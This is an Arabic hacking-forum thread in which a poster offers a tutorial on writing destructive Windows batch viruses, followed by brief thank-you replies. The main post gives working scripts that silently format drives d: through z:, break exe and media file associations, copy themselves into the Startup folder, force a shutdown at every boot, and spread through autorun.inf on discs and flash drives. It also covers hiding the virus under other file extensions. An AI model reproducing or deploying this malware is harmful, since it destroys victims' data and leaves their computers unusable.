العودة   :: Security امان العرب Arab :: > The real World Of Hacking & Security > [ اختراق الاجـهـزه والايـمـيـلات ] > [ الفايروسات Virus ]

[ الفايروسات Virus ] هذا القسم لجميع انواع الفايروسات الجديده منها والحديثة شروحات عملها ولطرق حل مشاكلها وكيفية ازالتها

موضوع مغلق
 
أدوات الموضوع انواع عرض الموضوع
قديم 12-24-2010, 11:04 PM   المشاركة رقم: 1
الكاتب
BAZA
.:: Black Buccaneer ::.
 
الصورة الرمزية BAZA
المعلومات  
التسجيل: Oct 2010
العضوية: 72075
المشاركات: 588
بمعدل : 0.21 يوميا
الإتصال BAZA غير متواجد حالياً


المنتدى  
:: new :: تعلم صناعة الفايروسات من الصفر حتى الاحتراف (ارجو التثبيت...)

بعد السلام..

لكم مني احلى دروس صناعة فيروسات قوية وغير مكشوفة
------------------------------------------------------------


ما هي ملفات الـ(Batch) ؟

وهي ملفات لبرامج مكتوبة باوامر نظام الـ(Dos) و لصنع ملف (Batch) افتح اي محرر نصوص ثم اكتب الاوامر التي تريدها ثم احفظه بامتداد (.Bat) .

ملاحظة
سأقوم بشرح الأوامر والملاحظات الأخرى خلال البرامج (اي بالتعليق على شفرات البرامج (اكواد البرامج ) ).
_____________________________________
·فايروس يعيد تهيئة السواقات
الشفرة (الكود)


Break off


Format d: /q/y


Format e: /q/y


Format f: /q/y


Format g: /q/y


Format h: /q/y


Format i: /q/y


Format j: /q/y


.


.


.


Format y: /q/y


Format z: /q/y

_____________________________________



شرح الفايروس

- يقوم باعادة التهيئة لاي عدد من السواقات ومهما تم تغيير احرفها عن الاحرف الاعتيادية وحتى الفلاشات ان وجدت .
- Break off يقوم بايقاف اي مقاطعة لان ال(Batch) يمكن ايقاف عمله بضغط ctrl+c .
- Format امر اعادة التهيئة المعروف وله عدة صيغ منها


Format driver:/q /y /v /fs

يستعمل الامر مع اسم السواقة لتهيئة بطيئة
يستعمل مع (/q) لتهيئة سريعه
يستعمل مع (/y) لتجاوز سؤال التاكيد
يستعمل مع (/v) لتغيير اسم السواقة


Format driver: /v: new****
يستعمل مع (fs) لتغيير نوع الملفات (fat,ntfs)


Format driver: /fs: newtype




· فايروس تعطيل ملفات الexe
الشفرة (الكود)


Break off


Ftype exefile=123


شرح الفايروس

- Break off تم شرحه مسبقا
- Ftype يستعمل بصيغتين عرض وتغيير
عرض : لعرض امتداد اي مشغل لاي نوع من الملفات نكتب


Ftype mplayer

تغيير : لتغيير امتداد اي مشغل سنستخدم التعويض بالمساواة


Ftype exefile=www


- كيف نعرف اسم المشغل لكل امتداد ؟
ج/ باستخدام الامر assoc
اذا كتبناه بمفرده سيعرض لنا جميع الامتدادت في النظام مع مشغلاتها
اذا كتبناه بالصيغة التالية


Assoc .mp3

سيعرض مشغل الامتداد المذكور فقط
واذا اردنا تغيير المشغل سنكتب بعد الصيغة السابقة = وبعدها المشغل الجديد
__________________________________
- عمل انتي فايروس للفايروس السابق كما يأتي :

Ftype exefile="%%1"%%*

اما عن معنى هذه الرموز فهي لان النظام كله مشغل للexe فلا يوجد مشغل معين .
__________________________________

· تشغيل الفايروسات عند كل بدء تشغيل وكالاتي :

اضف الكود الأتي إلى أي فايروس ويفضل بعد
ال(break off)
على فرض ان اسم الفايروس a.bat



Break off


Copy a.bat "C:\********s and Settings\All Users \Start Menu\Programs\Startup"

هذا المقطع سيعمل على نسخ الفايروس لنفسه في مجلد(فولدر) ال(Startup) من خلال الامر (copy) وعند كل تشغيل للويندوز يقوم النظام بتنفيذ جميع البرامج في هذا المجلد(startup) ومن ضمنها الفايروس , وهذا يعطينا فكرة الفايروس التالي :-
_____________________________________
· فايروس يعمل على إيقاف التشغيل عند كل بدء تشغيل

(أي أنه ببساطة لا يعطي المجال للحاسبة لتعمل فيعيد إطفائها)

الشفرة (الكود)


Break off


Copy a.bat "C:\********s and Settings\All Users \Start Menu\Programs\Startup"


Shutdown -f -s -t 00

___________________________________
ملاحظة:
مع افترض إن اسم الفايروس هو a.bat

شرح الفايروس
Shutdown - هو أمر من أوامر الدوس يقوم بعمل خروج من النظام وله تفاصيل كثيرة منها :


Shutdown -f -s -r -a -t mm

- -f تقوم بغلق جميع البرامج المفتوحة من غير تنبيه
- -s تقوم بإيقاف التشغيل
- -r تقوم بإعادة التشغيل
- -a تقوم بأحباط إيقاف التشغيل عند ظهور نافذة العد التنازلي
- -t mm تقوم بتغيير الوقت التنازلي قبل الإيقاف (ايقاف التشغيل)
ملاحظة
ليس من الواجب استعمال التفاصيل كلها معاً
وإنما نحن استعملنا (-f) لغلق البرامج المفتوحة إن وجدت واستعملنا (-s) لإيقاف التشغيل و(-t 00) لجعل الوقت التنازلي صفراً فيتم الإيقاف حالاً .
__________________________________

· تشغيل الفايروسات عند تشغيل ال(cd/dvd)

اي تشغيله من خلال الأوتورن (اي تشغيل تلقائي للقرص)

1- قم اولا بكتابة الفايروس ونسخه على القرص
2- افتح محرر نصوص واكتب الكود التالي :


[autorun]


OPEN=a.bat


ICON= icon****


LABEL= title

أما ال(OPEN) فهي لتشغيل الملف المطلوب وهو الفايروس هنا
وأما ال(ICON) فهي لوضع الايقونة للقرص (اي نضع اسم ملف الايقونة بدل (icon****))
وبالتأكيد يجب ان لاتنسى نسخ ملف الايقونة على القرص
واما ال(LABEL) فهو عنوان القرص (ويكون العنوان بدل كلمة (title))
احفظ الكود بالأسم والامتداد التالي autorun.inf
3- انسخ الملف السابق على القرص
4- القرص الذي بين يديك اصبح خطرا ضعه في مكان امن فقد تخطأ وتشغله أنت او أي شخص لايعلم محتوياته .


· تشغيل الفايروس من الفلاش ميموري أو أي سواقة (درايفر)

شرح الفكرة
سنعمل على وضع الفايروس بدل الـ(open) للفلاش أو السواقة
أقصد بذلك عند الضغط (دبل كلك) على الفلاش أو السواقة من المفترض أن يقوم النظام بفتح الفلاش أو السواقة ولكن سيتفاجأ الضحية بأن الفايروس هو الذي يعمل .
قم بإنشاء الملف التالي وأرفقه مع الفايروس :-
Autorun.inf
وأكتب فيه الأوامر التالية :-


[autorun]


****l\start\command= any virous


****l\start= any ****

إستبدل عبارة (any virous) بإسم الفايروس
إستبدل عبارة (any ****) بأي عبارة تريد أن تظهر في قائمة الزر الأيمن .
_____________________________________
· فايروس صناعة المشغلات الوهمية
شرح الفكرة
لقد قمنا سابقا بتعطيل امتداد ال(exe) ولكن لو جربنا هذا على احدى الامتدادات التي تحتاج مشغلا مثل ال(mp3) فسيستمر بالعمل دون تأثر لذلك سنقوم بتغيير المشغل لا امتداد المشغل وسنلاحظ مشكلة اخرى وهو ان الويندوز سيعرض لنا قائمة لتغيير المشغل ففي حالة ال(exe) لن تجد مشغل له ولكن يمكن ايجاد مشغل لل(mp3,wav,jpg,cpp,…) وغيرها لذلك سنقوم بابدال المشغل بفايروس وكما ياتي :
انشأ فايروسك (abc.bat) مثلا ثم انشأ في نفس المكان ملف (batch) اخر واكتب فيه (لتعطيل ال(mp3) على سبيل المثال)


Copy abc.bat "c:\windows"



ملحق 1



ملاحظات هامة

1- أذا تعطل عندك ملفات ال(exe) فحل المشكلة كما موضح اعلاه .
2- إذا تعطلت ملفات الـ(Batch) اذهب الى (start menu) ثم (All programs) ثم (Accessories) وافتح (Command Prompt) واكتب الامرين التاليين :

Assoc .bat=batfile


Ftype batfile="%1"%*

3-إذا تعطلت كل من ال(exe) و(bat) فحلك الوحيد في ملفات ال(com) إذهب الى (my computer) ثم (c ثم (windows) ثم (system32) ثم افتح command.com
واكتب الاوامرالتالية:

Assoc .bat=batfile


Ftype batfile="%1"%*


Assoc *****=exefile


Ftype exefile="%1"%*

4- هنالك اوامر كثيرة غير المذكورة يمكنك تعلمها كالاتي
افتح (Command Prompt) او (command.com) واكتب الامر help
ولمعرفة تفاصيل كل امر اكتب help متبوعة بالامر المطلوب
5- يمكنك استعمل بعض المتغيرات التي توصلك الى الهدف دون عناء , فمثلا للوصول الى مجلد الـ(windows) وانا لا اعرف اسم سواقة الضحية , فماذا افعل ؟
بكل بساطة يوفر الويندوز لنا متغيرات تدل على مجموعة من المواقع المهمة منها :


systemRoot =C:\windows

وللوصول لاي متغير يجب ان يحاط ب %المتغير% مثل
%systemRoot%
لمعرفة باقي الاوامر افتح شاشة الدوس واكتب الامر set
لتغيير قيمة المتغير نكتب set ****= newvalue
- **** تعني اسم المتغير
- Newvalue تعني القيمة الجديدة
لإنشاء متغير جديد نكتب :

Set **** = value

- **** تعني اسم المتغير الجديد
- Value تعني قيمة ذلك المتغير
هناك متغيرات غير مذكورة ضمن الامر (set) منها :
%DATE%
%TIME%
وهما متغيران للوقت والتأريخ وكذلك المتغير (%%RANDOM) الذي يولد ارقام عشوائية.

6- الامر (path) عند كتابته يعرض المجلدات الافتراضية التي يبحث الويندوز فيها عن ملفات الدعم كما استخدمنا هذه الخاصية سابقا في انشاء مشغل وهمي .

7-يجب ان تعلم ان ملفات الـ(Batch) لم يتم ايجادها لانشاء الفايروسات ولكن هناك تطبيقات كثيرة يمكن اجراءها بواسطة هذا النوع من الملفات مثل برامج التنصيب وايجاد الاختصارات للبرامج اعادة تهيئة بعض السواقات وغيرها .

8- يمكن خزن جميع البرامج السابقة بامتداد (.cmd) لتعطي نفس النتيجة .

9- يمكن انشاء اي امتداد جديد يحمل صفة موجودة سابقا مثلا لإنشاء ملف يعمل عمل الـ(Batch) سنقوم اولا بتحديد اسم الامتداد الجديد وليكن (.dog) وسنكتب الكود التالي :


Assoc .dog=batfile

حيث ان (batfile) هو مشغل ملفات ال(batch)
وهكذا بالنسبة لاي امتداد فيديو او صوت او صورة او حتى ال(exe) .

************************************************

Assoc .mp3=aaa


Ftype aaa=abc.bat

لتعطيل امتداد ال(jpg)


Copy abc.bat "c:\ windows"


Assoc .jpg=aaa


Ftype aaa=abc.bat


وبعد هذا يمكنك تعطيل اي ملف وورد او بوربوينت او كود سي بلس بلس او اي لغة او اي امتداد ولقد قمنا باستغلال خاصية الويندوز فهو يبحث عن المشغلات في ملفات الدعم ال(windows) او (system32) او (***m) .

_____________________________________
·إخفاء الفايروسات عن الانظار
شرح الفكرة
سنخزن الفايروس بامتداد غير ال(bat) وليكن مثلا (dll) او (jpg) او حتى امتداد غير موجود اصلا مثل (.ali) ثم نستدعيه كالاتي :
- اكتب الفايروس واخزنه باي امتداد
- اعمل ملف (batch) واكتب فيه


Copy abc.jpg abc.bat

ويمكن تغيير المسار الذي سيتم النسخ فيه وبذلك نكون قد غيرنا امتداده وسيعمل كملف (batch) .




ملاحظة

هنالك برنامج ملحق بالدرس يقوم بتحويل أي ملف (Bat) الى (exe)
سهل الاستخدام لا يحتاج الى شرح .

************************************************** *********


ارض الديف بوينت الانجاز هوة المستقبل


ملحق2



شرح بعض أوامر الدوس(DOS)


- Cd
يستخدم هذا الأمر للتنقل بين المجلدات سواء في فتح مجلد داخل المجلد الاصلي أو الرجوع الى المجلد السابق وكالأتي:


Cd ****

لفتح مجلد


cd..

للرجوع خطوة الى المجلد السابق


cd\

لإغلاق جميع المجلدات والرجوع الى محث السواقة .

- Md
لإنشاء مجلد جديد md ****
- Rd
لحذف مجلد وله خياران
/q للحذف دون تنبيه
/s لحذف جميع محتويات المجلد من ملفات ومجلدات أخرى
- Dir
لعرض الملفات والمجلدات داخل المجلد الحالي
- Start
لتشغيل الملفات بذكر الأمر يتبعه اسم الملف المراد تشغيله حتى لو كان صورة
- Attrib
أمر هام جدا يستعمل كثيرا من قبل مبرمجي الفايروسات مع اني لم استعمله في المحاضرة أعلاه يقوم بتغير خواص الملف من حيث للقراءة فقط أو مخفي أو من برامج النظام ....الخ .
+ - r لرفع أو إضافة خاصية للقراءة فقط
+ - h لرفع أو إضافة خاصية مخفي
+ - a لرفع أو إضافة خاصية ملف أرشيف
+ - s لرفع أو إضافة خاصية ملف نظام
- Call
لإستدعاء ملف باتش أخر .
- Cls
لمسح الشاشة
- Color
لتغيير لون الشاشة والصيغة العامة


Color xy


X لون الشاشة


Y لون الخط





اللون
الرمز
اللون
الرمز
أسود
0
رمادي
8
أزرق
1
أزرق مضيء
9
أخضر
2
أخضر مضيء
A
بني
3
بني مضيء
B
أحمر
4
أحمر مضيء
C
إرجواني
5
إرجواني مضيء
D
أصفر
6
أصفر مضيء
E
أبيض
7
أبيض لامع
F


- Cmd
لتشغيل نافذة جديدة من دوس
- Compact
لضغط السواقات
- Date
لمعرفة التأريخ أو تغييره
- Time
لمعرفة الوقت أو تغييره
- Del
أمر حذف الملفات له عدة خيارات أهمها :


Del [path] /s /q


/s لحذف كافة الملفات من المجلد الرئيسي وكافة المجلدات الفرعية .
/qللحذف دون تنبيه
- Echo
يستخدم هذا الأمر على شكلين
الأول في أخفاء أو إظهار مسار البرنامج حسب ما يكتبه الدوس وتعليقاته
لإيقاف ظهور التعليقات نكتب


Echo off

لإظهرها نكتب


Echo on

والثاني لطباعة جملة على الشاشة


Echo good morning

- Erase
نفس الأمر del
- Exit
للخروج من شاشة الدوس
- Find
لإيجاد كلمة في ملف نصي , الصيغة العامة :-



Find /v /c /n /I **** [path]

/vيقوم بعرض الأسطر التي لا تحتوي على كلمة البحث
/cيعرض عدد الأسطر التي تحتوي على كلمة البحث
/nيعرض أرقام الأسطر التي فيها كلمة البحث مع عرض السطر
/iيتجاهل حالة الأحرف
- Edit
يفتح محرر نصوص من خلال الدوس
- Fc
للمقارنه بين ملفين وعرض الفروق


Fc file1.txt file2.txt

- Move
لنقل الملفات من مكان الى أخر , والصيغة العامة :


Move /y /-y [path1] [path2]

/y للنقل دون تأكيد
/-y للنقل مع التأييد
- Pause
لإيقاف عمل البرنامج حتى الضغط على لوحة المفاتيح
- Pushd & popd
أوامر المكدس لخزن المسار الحالي والإنتقال فوراَ الى مسار جديد والعودة من خلال Popd


Pushd c:\widows


Popd


- Print
لطباعة ملف على الطابعة
- Ren
لإعادة تسمية ملف


Ren [path] new ****

- Set
سبق وأن تطرقت لهذا الأمر الذي يستعمل في عرض متغيرات ويندوز إضافة الى إنشاء متغيرات جديدة وقتية
وبمجرد كتابة هذا الامر سوف يعرض لك قائمة كبيرة من المتغيرات منها من يدل على مسار الويندوز وأخر لل(programfiles) وأخر لل(alluser) و...و...

- Title
لعرض عنوان لشاشة الدوس فعند كتابة :


Title computer

ستظهر كلمة (computer) في اعلى يسار الشاشة
- Shutdown
تم شرحه مسبقا
- Log off
لعمل تسجيل خروج
*************************************************

تم الانتهاء من الدرس الشامل والكامل والكمال لله وحده

ارجوووووووووو التقيم+الردود

من عند أخوكم








bazamohamed












توقيع : BAZA

hacker-dz1@live.fr
*********
*******
*****
***

**
*
Black Buccaneer
عرض البوم صور BAZA  

قديم 12-24-2010, 11:24 PM   المشاركة رقم: 2
الكاتب
BAZA
.:: Black Buccaneer ::.
 
الصورة الرمزية BAZA
المعلومات  
التسجيل: Oct 2010
العضوية: 72075
المشاركات: 588
بمعدل : 0.21 يوميا
الإتصال BAZA غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

الي يشوفكم يقول "كلكم محترفين ما شاء الله"












توقيع : BAZA

hacker-dz1@live.fr
*********
*******
*****
***

**
*
Black Buccaneer
عرض البوم صور BAZA  

قديم 12-31-2010, 03:53 PM   المشاركة رقم: 3
الكاتب
ybs4ever
.:: عضو مشارك ::.
 
الصورة الرمزية ybs4ever
المعلومات  
التسجيل: Jul 2010
العضوية: 61018
المشاركات: 154
بمعدل : 0.05 يوميا
الإتصال ybs4ever غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

شكرا اخوي على المعلومات












عرض البوم صور ybs4ever  

قديم 01-07-2011, 09:40 AM   المشاركة رقم: 4
الكاتب
bandr-2233
.:: عضو مشارك ::.
 
الصورة الرمزية bandr-2233
المعلومات  
التسجيل: Dec 2010
العضوية: 80765
المشاركات: 158
بمعدل : 0.06 يوميا
الإتصال bandr-2233 غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مشكور وما قصرت












عرض البوم صور bandr-2233  

قديم 01-25-2011, 02:04 PM   المشاركة رقم: 5
الكاتب
خطاب الهكر
.:: عضو جديد ::.
 
الصورة الرمزية خطاب الهكر
المعلومات  
التسجيل: Dec 2010
العضوية: 81613
المشاركات: 11
بمعدل : 0.00 يوميا
الإتصال خطاب الهكر غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

k:

مشكووووووووووووووووووووووووووووووووووووووووووووووو وووووووووووووووور

k:












عرض البوم صور خطاب الهكر  

قديم 01-25-2011, 04:46 PM   المشاركة رقم: 6
الكاتب
TiTaNiCk
.:: عضو مميز ::.
المعلومات  
التسجيل: Sep 2010
العضوية: 67172
الدولة: آلــكويـت
المشاركات: 689
بمعدل : 0.24 يوميا
الإتصال TiTaNiCk غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي












توقيع : TiTaNiCk

# ~ TiTaNiCk_Q8~ #


hDa@WiNdOwSlive.CoM

TiTaNiCk305@Gmail.com


WeLCoMe v4-team

عرض البوم صور TiTaNiCk  

قديم 01-31-2011, 02:58 AM   المشاركة رقم: 7
الكاتب
هكر مكر
.:: موقوف ::.
المعلومات  
التسجيل: Oct 2010
العضوية: 71730
المشاركات: 426
بمعدل : 0.15 يوميا
الإتصال هكر مكر غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

جاري.....












عرض البوم صور هكر مكر  

قديم 02-17-2012, 04:04 PM   المشاركة رقم: 8
الكاتب
IRAQ_HACKER
.:: عضو ::.
المعلومات  
التسجيل: Feb 2012
العضوية: 129655
الدولة: iraq
المشاركات: 29
بمعدل : 0.01 يوميا
الإتصال IRAQ_HACKER غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مشكــــــــــــــــــــــــــــــــــور أو ماقصرت












عرض البوم صور IRAQ_HACKER  

قديم 02-18-2012, 08:24 PM   المشاركة رقم: 9
الكاتب
NOklA
.:: موقوف ::.
المعلومات  
التسجيل: Nov 2011
العضوية: 116566
المشاركات: 1,373
بمعدل : 0.56 يوميا
الإتصال NOklA غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مـــــشـــــكــــــؤؤؤؤر يعطيك العافيه












عرض البوم صور NOklA  

قديم 03-14-2013, 10:11 AM   المشاركة رقم: 10
الكاتب
abdelhamed_eg
.:: عضو جديد ::.
المعلومات  
التسجيل: Feb 2010
العضوية: 49895
المشاركات: 1
بمعدل : 0.00 يوميا
الإتصال abdelhamed_eg غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مشكوووووووووووووووووووور












عرض البوم صور abdelhamed_eg  

موضوع مغلق

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
الفيروسات


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
كورس تعلم اللغه الفرنسيه من الصفر الى الاحتراف تيتوميكانو [ القسم العام ] 0 11-12-2010 03:30 PM
كورس تعلم اللغه الفرنسيه من الصفر الى الاحتراف تيتووالنجم [ الـبـرامـج العام ] 1 10-19-2010 08:27 PM


الساعة الآن 05:32 PM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.